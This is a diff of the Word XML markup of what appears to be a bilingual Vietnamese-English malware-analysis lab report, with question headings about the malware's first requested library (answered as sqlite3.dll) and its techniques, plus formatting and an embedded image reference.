+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3864606C" wp14:editId="35DD90C7">
+            <wp:extent cx="5943600" cy="2814320"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="1304421369" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1304421369" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -1768,7 +2656,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2874645"/>
+                      <a:ext cx="5943600" cy="2814320"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1780,44 +2668,33 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1827,14 +2704,6 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q3</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1844,545 +2713,34 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Identifying</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>initial</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>actions</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>post-infection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> can </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>provide</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>insights</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>into</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>primary</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>objectives</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>What</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>first</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>library</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>that</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>requests</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>post-infection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>?</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="42"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Quay lại với phần </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>details</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>để kiểm tra t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hư viện đầu tiên mà phần mềm độc hại yêu cầu sau khi </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>nhiễm</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cần xem lại </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>scanned</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> đầu tiên và </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">tệp cuối cùng được nhấm đến </w:t>
-      </w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="42"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Kết quả được phân tích ra là </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>sqlite3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dll, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">là một </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>file</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> thư viện liên kết động thuộc hệ quản trị cơ sở dữ liệu </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>SQLite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2399,11 +2757,415 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:t>Q4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Understanding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>techniques</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>used</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>by</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>helps</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>strategic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
